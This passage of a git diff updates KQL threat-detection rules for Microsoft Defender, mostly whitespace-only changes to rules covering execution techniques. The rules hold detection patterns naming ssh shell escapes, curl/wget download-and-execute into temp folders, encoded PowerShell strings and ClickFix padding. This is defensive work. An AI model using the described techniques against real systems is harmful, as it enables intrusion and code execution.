L.P.) +// Date: 2024-08-29 +// Level: high +// Description: Detects the use of the "ssh" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents | where (ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/dash" or ProcessCommandLine contains "/bin/fish" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/zsh" or ProcessCommandLine contains "sh 0<&2 1>&2" or ProcessCommandLine contains "sh 1>&2 0<&2") and ((ProcessCommandLine contains "ProxyCommand=;" or ProcessCommandLine contains "permitlocalcommand=yes" or ProcessCommandLine contains "localhost") and FolderPath endswith "/ssh") \ No newline at end of file diff --git a/KQL/rules/Execution/silenttrinity_stager_msbuild_activity.kql b/KQL/rules/Execution/silenttrinity_stager_msbuild_activity.kql index 0e7beea9..60bd1a55 100644 --- a/KQL/rules/Execution/silenttrinity_stager_msbuild_activity.kql +++ b/KQL/rules/Execution/silenttrinity_stager_msbuild_activity.kql @@ -1,10 +1,10 @@ -// Title: Silenttrinity Stager Msbuild Activity -// Author: Kiran kumar s, oscd.community -// Date: 2020-10-11 -// Level: high -// Description: Detects a possible remote connections to Silenttrinity c2 -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.t1127.001 - -DeviceNetworkEvents +// Title: Silenttrinity Stager Msbuild Activity +// Author: Kiran kumar s, oscd.community +// Date: 2020-10-11 +// Level: high +// Description: Detects a possible remote connections to Silenttrinity c2 +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1127.001 + +DeviceNetworkEvents | where InitiatingProcessFolderPath endswith "\\msbuild.exe" and (RemotePort in~ ("80", "443")) \ No newline at end of file diff --git a/KQL/rules/Execution/sql_client_tools_powershell_session_detection.kql b/KQL/rules/Execution/sql_client_tools_powershell_session_detection.kql index 5e7fe91b..c73d11dc 100644 --- a/KQL/rules/Execution/sql_client_tools_powershell_session_detection.kql +++ b/KQL/rules/Execution/sql_client_tools_powershell_session_detection.kql @@ -1,13 +1,13 @@ -// Title: SQL Client Tools PowerShell Session Detection -// Author: Agro (@agro_sev) oscd.communitly -// Date: 2020-10-13 -// Level: medium -// Description: This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio. -// Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1127 -// False Positives: -// - Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action. - -DeviceProcessEvents +// Title: SQL Client Tools PowerShell Session Detection +// Author: Agro (@agro_sev) oscd.communitly +// Date: 2020-10-13 +// Level: medium +// Description: This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio. +// Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1127 +// False Positives: +// - Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action. + +DeviceProcessEvents | where (FolderPath endswith "\\sqltoolsps.exe" or InitiatingProcessFolderPath endswith "\\sqltoolsps.exe" or ProcessVersionInfoOriginalFileName =~ "\\sqltoolsps.exe") and (not(InitiatingProcessFolderPath endswith "\\smss.exe")) \ No newline at end of file diff --git a/KQL/rules/Execution/start_windows_service_via_net_exe.kql b/KQL/rules/Execution/start_windows_service_via_net_exe.kql index cd8eafac..497aca43 100644 --- a/KQL/rules/Execution/start_windows_service_via_net_exe.kql +++ b/KQL/rules/Execution/start_windows_service_via_net_exe.kql @@ -1,12 +1,12 @@ -// Title: Start Windows Service Via Net.EXE -// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community -// Date: 2019-10-21 -// Level: low -// Description: Detects the usage of the "net.exe" command to start a service using the "start" flag -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1569.002 -// False Positives: -// - Legitimate administrator or user executes a service for legitimate reasons. - -DeviceProcessEvents +// Title: Start Windows Service Via Net.EXE +// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community +// Date: 2019-10-21 +// Level: low +// Description: Detects the usage of the "net.exe" command to start a service using the "start" flag +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1569.002 +// False Positives: +// - Legitimate administrator or user executes a service for legitimate reasons. + +DeviceProcessEvents | where ProcessCommandLine contains " start " and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) \ No newline at end of file diff --git a/KQL/rules/Execution/successful_account_login_via_wmi.kql b/KQL/rules/Execution/successful_account_login_via_wmi.kql index e1d4a6ee..e2c25695 100644 --- a/KQL/rules/Execution/successful_account_login_via_wmi.kql +++ b/KQL/rules/Execution/successful_account_login_via_wmi.kql @@ -1,13 +1,13 @@ -// Title: Successful Account Login Via WMI -// Author: Thomas Patzke -// Date: 2019-12-04 -// Level: low -// Description: Detects successful logon attempts performed with WMI -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1047 -// False Positives: -// - Monitoring tools -// - Legitimate system administration - -DeviceLogonEvents +// Title: Successful Account Login Via WMI +// Author: Thomas Patzke +// Date: 2019-12-04 +// Level: low +// Description: Detects successful logon attempts performed with WMI +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047 +// False Positives: +// - Monitoring tools +// - Legitimate system administration + +DeviceLogonEvents | where InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_binaries_and_scripts_in_public_folder.kql b/KQL/rules/Execution/suspicious_binaries_and_scripts_in_public_folder.kql index dea171ba..b896cc0c 100644 --- a/KQL/rules/Execution/suspicious_binaries_and_scripts_in_public_folder.kql +++ b/KQL/rules/Execution/suspicious_binaries_and_scripts_in_public_folder.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Binaries and Scripts in Public Folder -// Author: The DFIR Report -// Date: 2025-01-23 -// Level: high -// Description: Detects the creation of a file with a suspicious extension in the public folder, which could indicate potential malicious activity. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1204 -// False Positives: -// - Administrators deploying legitimate binaries to public folders. - -DeviceFileEvents +// Title: Suspicious Binaries and Scripts in Public Folder +// Author: The DFIR Report +// Date: 2025-01-23 +// Level: high +// Description: Detects the creation of a file with a suspicious extension in the public folder, which could indicate potential malicious activity. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204 +// False Positives: +// - Administrators deploying legitimate binaries to public folders. + +DeviceFileEvents | where FolderPath contains ":\\Users\\Public\\" and (FolderPath endswith ".bat" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".js" or FolderPath endswith ".ps1" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_binary_in_user_directory_spawned_from_office_application.kql b/KQL/rules/Execution/suspicious_binary_in_user_directory_spawned_from_office_application.kql index 453e0bf3..15ef6478 100644 --- a/KQL/rules/Execution/suspicious_binary_in_user_directory_spawned_from_office_application.kql +++ b/KQL/rules/Execution/suspicious_binary_in_user_directory_spawned_from_office_application.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Binary In User Directory Spawned From Office Application -// Author: Jason Lynch -// Date: 2019-04-02 -// Level: high -// Description: Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio) -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1204.002, attack.g0046, car.2013-05-002 - -DeviceProcessEvents +// Title: Suspicious Binary In User Directory Spawned From Office Application +// Author: Jason Lynch +// Date: 2019-04-02 +// Level: high +// Description: Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio) +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002, attack.g0046, car.2013-05-002 + +DeviceProcessEvents | where (FolderPath endswith ".exe" and FolderPath startswith "C:\\users\\" and (InitiatingProcessFolderPath endswith "\\WINWORD.EXE" or InitiatingProcessFolderPath endswith "\\EXCEL.EXE" or InitiatingProcessFolderPath endswith "\\POWERPNT.exe" or InitiatingProcessFolderPath endswith "\\MSPUB.exe" or InitiatingProcessFolderPath endswith "\\VISIO.exe" or InitiatingProcessFolderPath endswith "\\MSACCESS.exe" or InitiatingProcessFolderPath endswith "\\EQNEDT32.exe")) and (not(FolderPath endswith "\\Teams.exe")) \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_child_process_of_bginfo_exe.kql b/KQL/rules/Execution/suspicious_child_process_of_bginfo_exe.kql index 8a34bb30..1e46d243 100644 --- a/KQL/rules/Execution/suspicious_child_process_of_bginfo_exe.kql +++ b/KQL/rules/Execution/suspicious_child_process_of_bginfo_exe.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Child Process Of BgInfo.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-08-16 -// Level: high -// Description: Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.005, attack.defense-evasion, attack.t1218, attack.t1202 - -DeviceProcessEvents +// Title: Suspicious Child Process Of BgInfo.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-16 +// Level: high +// Description: Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.005, attack.defense-evasion, attack.t1218, attack.t1202 + +DeviceProcessEvents | where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\AppData\\Roaming\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\PerfLogs\\")) and (InitiatingProcessFolderPath endswith "\\bginfo.exe" or InitiatingProcessFolderPath endswith "\\bginfo64.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_deno_file_written_from_remote_source.kql b/KQL/rules/Execution/suspicious_deno_file_written_from_remote_source.kql index 8827aa3e..a68ba8a4 100644 --- a/KQL/rules/Execution/suspicious_deno_file_written_from_remote_source.kql +++ b/KQL/rules/Execution/suspicious_deno_file_written_from_remote_source.kql @@ -1,13 +1,13 @@ -// Title: Suspicious Deno File Written from Remote Source -// Author: Josh Nickels, Michael Taggart -// Date: 2025-05-22 -// Level: low -// Description: Detects Deno writing a file from a direct HTTP(s) call and writing to the appdata folder or bringing it's own malicious DLL. -// This behavior may indicate an attempt to execute remotely hosted, potentially malicious files through deno. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1204, attack.t1059.007, attack.command-and-control, attack.t1105 -// False Positives: -// - Legitimate usage of deno to request a file or bring a DLL to a host - -DeviceFileEvents +// Title: Suspicious Deno File Written from Remote Source +// Author: Josh Nickels, Michael Taggart +// Date: 2025-05-22 +// Level: low +// Description: Detects Deno writing a file from a direct HTTP(s) call and writing to the appdata folder or bringing it's own malicious DLL. +// This behavior may indicate an attempt to execute remotely hosted, potentially malicious files through deno. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204, attack.t1059.007, attack.command-and-control, attack.t1105 +// False Positives: +// - Legitimate usage of deno to request a file or bring a DLL to a host + +DeviceFileEvents | where (FolderPath contains "\\deno\\gen\\" or FolderPath contains "\\deno\\remote\\https\\") and (FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_download_and_execute_pattern_via_curl_wget.kql b/KQL/rules/Execution/suspicious_download_and_execute_pattern_via_curl_wget.kql index 764a41bf..67d2a5c2 100644 --- a/KQL/rules/Execution/suspicious_download_and_execute_pattern_via_curl_wget.kql +++ b/KQL/rules/Execution/suspicious_download_and_execute_pattern_via_curl_wget.kql @@ -1,16 +1,16 @@ -// Title: Suspicious Download and Execute Pattern via Curl/Wget -// Author: Aayush Gupta -// Date: 2025-06-17 -// Level: high -// Description: Detects suspicious use of command-line tools such as curl or wget to download remote -// content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by -// immediate execution, indicating potential malicious activity. This pattern is commonly used -// by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.004, attack.t1203 -// False Positives: -// - System update scripts using temporary files -// - Installer scripts or automated provisioning tools - -DeviceProcessEvents +// Title: Suspicious Download and Execute Pattern via Curl/Wget +// Author: Aayush Gupta +// Date: 2025-06-17 +// Level: high +// Description: Detects suspicious use of command-line tools such as curl or wget to download remote +// content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by +// immediate execution, indicating potential malicious activity. This pattern is commonly used +// by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.004, attack.t1203 +// False Positives: +// - System update scripts using temporary files +// - Installer scripts or automated provisioning tools + +DeviceProcessEvents | where (ProcessCommandLine contains "/curl" or ProcessCommandLine contains "/wget") and ProcessCommandLine contains "sh -c" and (ProcessCommandLine contains "/tmp/" or ProcessCommandLine contains "/dev/shm/") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_electron_application_child_processes.kql b/KQL/rules/Execution/suspicious_electron_application_child_processes.kql index bacdf833..212f96f2 100644 --- a/KQL/rules/Execution/suspicious_electron_application_child_processes.kql +++ b/KQL/rules/Execution/suspicious_electron_application_child_processes.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Electron Application Child Processes -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-10-21 -// Level: medium -// Description: Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of ".asar" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule) -// MITRE Tactic: Execution -// Tags: attack.execution - -DeviceProcessEvents +// Title: Suspicious Electron Application Child Processes +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-21 +// Level: medium +// Description: Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of ".asar" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule) +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents | where (InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\discord.exe" or InitiatingProcessFolderPath endswith "\\GitHubDesktop.exe" or InitiatingProcessFolderPath endswith "\\keybase.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe" or InitiatingProcessFolderPath endswith "\\msteams.exe" or InitiatingProcessFolderPath endswith "\\slack.exe" or InitiatingProcessFolderPath endswith "\\teams.exe") and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\ProgramData\\" or FolderPath contains ":\\Temp\\" or FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Temp\\")) and (not((ProcessCommandLine contains "\\NVSMI\\nvidia-smi.exe" and FolderPath endswith "\\cmd.exe" and InitiatingProcessFolderPath endswith "\\Discord.exe"))) \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_encoded_and_obfuscated_reflection_assembly_load_function_call.kql b/KQL/rules/Execution/suspicious_encoded_and_obfuscated_reflection_assembly_load_function_call.kql index f2ef91d2..557b32bc 100644 --- a/KQL/rules/Execution/suspicious_encoded_and_obfuscated_reflection_assembly_load_function_call.kql +++ b/KQL/rules/Execution/suspicious_encoded_and_obfuscated_reflection_assembly_load_function_call.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call -// Author: pH-T (Nextron Systems) -// Date: 2022-03-01 -// Level: high -// Description: Detects suspicious base64 encoded and obfuscated "LOAD" keyword used in .NET "reflection.assembly" -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.t1059.001, attack.t1027 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call +// Author: pH-T (Nextron Systems) +// Date: 2022-03-01 +// Level: high +// Description: Detects suspicious base64 encoded and obfuscated "LOAD" keyword used in .NET "reflection.assembly" +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1059.001, attack.t1027 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains "OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATABvACIAKwAiAGEAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATABvAGEAIgArACIAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA" or ProcessCommandLine contains "OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATABvACcAKwAnAGEAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA" or ProcessCommandLine contains "OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATABvAGEAJwArACcAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA" \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_encoded_powershell_command_line.kql b/KQL/rules/Execution/suspicious_encoded_powershell_command_line.kql index 46581024..b4c94242 100644 --- a/KQL/rules/Execution/suspicious_encoded_powershell_command_line.kql +++ b/KQL/rules/Execution/suspicious_encoded_powershell_command_line.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Encoded PowerShell Command Line -// Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community -// Date: 2018-09-03 -// Level: high -// Description: Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet) -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001 - -DeviceProcessEvents +// Title: Suspicious Encoded PowerShell Command Line +// Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community +// Date: 2018-09-03 +// Level: high +// Description: Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet) +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 + +DeviceProcessEvents | where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (((ProcessCommandLine contains " JAB" or ProcessCommandLine contains " SUVYI" or ProcessCommandLine contains " SQBFAFgA" or ProcessCommandLine contains " aQBlAHgA" or ProcessCommandLine contains " aWV4I" or ProcessCommandLine contains " IAA" or ProcessCommandLine contains " IAB" or ProcessCommandLine contains " UwB" or ProcessCommandLine contains " cwB") and ProcessCommandLine contains " -e") or (ProcessCommandLine contains ".exe -ENCOD " or ProcessCommandLine contains " BA^J e-")) and (not(ProcessCommandLine contains " -ExecutionPolicy remotesigned ")) \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_execution_location_of_wermgr_exe.kql b/KQL/rules/Execution/suspicious_execution_location_of_wermgr_exe.kql index 1fe5f0c2..f0985def 100644 --- a/KQL/rules/Execution/suspicious_execution_location_of_wermgr_exe.kql +++ b/KQL/rules/Execution/suspicious_execution_location_of_wermgr_exe.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Execution Location Of Wermgr.EXE -// Author: Florian Roth (Nextron Systems) -// Date: 2022-10-14 -// Level: high -// Description: Detects suspicious Windows Error Reporting manager (wermgr.exe) execution location. -// MITRE Tactic: Execution -// Tags: attack.execution - -DeviceProcessEvents +// Title: Suspicious Execution Location Of Wermgr.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2022-10-14 +// Level: high +// Description: Detects suspicious Windows Error Reporting manager (wermgr.exe) execution location. +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents | where FolderPath endswith "\\wermgr.exe" and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_execution_of_powershell_with_base64.kql b/KQL/rules/Execution/suspicious_execution_of_powershell_with_base64.kql index e1d5ccdf..fbe91752 100644 --- a/KQL/rules/Execution/suspicious_execution_of_powershell_with_base64.kql +++ b/KQL/rules/Execution/suspicious_execution_of_powershell_with_base64.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Execution of Powershell with Base64 -// Author: frack113 -// Date: 2022-01-02 -// Level: medium -// Description: Commandline to launch powershell with a base64 payload -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001 - -DeviceProcessEvents +// Title: Suspicious Execution of Powershell with Base64 +// Author: frack113 +// Date: 2022-01-02 +// Level: medium +// Description: Commandline to launch powershell with a base64 payload +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 + +DeviceProcessEvents | where ((ProcessCommandLine contains " -e " or ProcessCommandLine contains " -en " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -enco" or ProcessCommandLine contains " -ec ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (not(((InitiatingProcessFolderPath contains "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or InitiatingProcessFolderPath contains "\\gc_worker.exe") or ProcessCommandLine contains " -Encoding "))) \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql b/KQL/rules/Execution/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql index 012aac26..58552aa1 100644 --- a/KQL/rules/Execution/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql +++ b/KQL/rules/Execution/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Explorer Process with Whitespace Padding - ClickFix/FileFix -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-11-04 -// Level: high -// Description: Detects process creation with suspicious whitespace padding followed by a '#' character, which may indicate ClickFix or FileFix techniques used to conceal malicious commands from visual inspection. -// ClickFix and FileFix are social engineering attack techniques where adversaries distribute phishing documents or malicious links that deceive users into opening the Windows Run dialog box or File Explorer search bar. -// The victims are then instructed to paste commands from their clipboard, which contain extensive whitespace padding using various Unicode space characters to push the actual malicious command far to the right, effectively hiding it from immediate view. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1204.004, attack.defense-evasion, attack.t1027.010 - -DeviceProcessEvents +// Title: Suspicious Explorer Process with Whitespace Padding - ClickFix/FileFix +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-11-04 +// Level: high +// Description: Detects process creation with suspicious whitespace padding followed by a '#' character, which may indicate ClickFix or FileFix techniques used to conceal malicious commands from visual inspection. +// ClickFix and FileFix are social engineering attack techniques where adversaries distribute phishing documents or malicious links that deceive users into opening the Windows Run dialog box or File Explorer search bar. +// The victims are then instructed to paste commands from their clipboard, which contain extensive whitespace padding using various Unicode space characters to push the actual malicious command far to the right, effectively hiding it from immediate view. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.004, attack.defense-evasion, attack.t1027.010 + +DeviceProcessEvents | where (ProcessCommandLine contains "#" and FolderPath endswith "\\explorer.exe") and (ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains " ") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_file_characteristics_due_to_missing_fields.kql b/KQL/rules/Execution/suspicious_file_characteristics_due_to_missing_fields.kql index 498abae2..882207d0 100644 --- a/KQL/rules/Execution/suspicious_file_characteristics_due_to_missing_fields.kql +++ b/KQL/rules/Execution/suspicious_file_characteristics_due_to_missing_fields.kql @@ -1,10 +1,10 @@ -// Title: Suspicious File Characteristics Due to Missing Fields -// Author: Markus Neis, Sander Wiebing -// Date: 2018-11-22 -// Level: medium -// Description: Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.006 - -DeviceProcessEvents +// Title: Suspicious File Characteristics Due to Missing Fields +// Author: Markus Neis, Sander Wiebing +// Date: 2018-11-22 +// Level: medium +// Description: Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.006 + +DeviceProcessEvents | where ((ProcessVersionInfoFileDescription =~ "?" and ProcessVersionInfoProductVersion =~ "?") or (ProcessVersionInfoFileDescription =~ "?" and ProcessVersionInfoProductName =~ "?") or (ProcessVersionInfoCompanyName =~ "?" and ProcessVersionInfoFileDescription =~ "?")) and FolderPath contains "\\Downloads\\" \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_file_created_in_perflogs.kql b/KQL/rules/Execution/suspicious_file_created_in_perflogs.kql index c8d27aee..41026715 100644 --- a/KQL/rules/Execution/suspicious_file_created_in_perflogs.kql +++ b/KQL/rules/Execution/suspicious_file_created_in_perflogs.kql @@ -1,12 +1,12 @@ -// Title: Suspicious File Created In PerfLogs -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-05 -// Level: medium -// Description: Detects suspicious file based on their extension being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 -// False Positives: -// - Unlikely - -DeviceFileEvents +// Title: Suspicious File Created In PerfLogs +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-05 +// Level: medium +// Description: Detects suspicious file based on their extension being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Unlikely + +DeviceFileEvents | where (FolderPath endswith ".7z" or FolderPath endswith ".bat" or FolderPath endswith ".bin" or FolderPath endswith ".chm" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".lnk" or FolderPath endswith ".ps1" or FolderPath endswith ".psm1" or FolderPath endswith ".py" or FolderPath endswith ".scr" or FolderPath endswith ".sys" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".zip") and FolderPath startswith "C:\\PerfLogs\\" \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql b/KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql index 61e252ec..78285879 100644 --- a/KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql +++ b/KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql @@ -1,10 +1,10 @@ -// Title: Suspicious File Download From File Sharing Domain Via Curl.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-05 -// Level: high -// Description: Detects potentially suspicious file download from file sharing domains using curl.exe -// MITRE Tactic: Execution -// Tags: attack.execution - -DeviceProcessEvents +// Title: Suspicious File Download From File Sharing Domain Via Curl.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-05 +// Level: high +// Description: Detects potentially suspicious file download from file sharing domains using curl.exe +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents | where (ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".msi" or 